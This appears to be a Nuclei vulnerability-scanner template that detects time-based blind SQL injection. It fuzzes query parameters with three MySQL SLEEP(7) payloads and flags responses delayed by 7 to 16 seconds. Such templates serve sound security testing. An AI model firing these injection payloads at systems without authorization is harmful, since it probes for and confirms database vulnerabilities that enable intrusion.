id: time-based-sqli

info:
  name: Time-Based Blind SQL Injection
  author: 0xKayala
  severity: critical
  description: |
    This Template detects time-based Blind SQL Injection vulnerability
  tags: time-based-sqli,sqli,dast,blind

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - "duration<=7"
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET / HTTP/1.1
        Host: {{Hostname}}

    payloads:
      injection:
        - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
        - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
        - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{injection}}"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "duration>=7 && duration <=16"
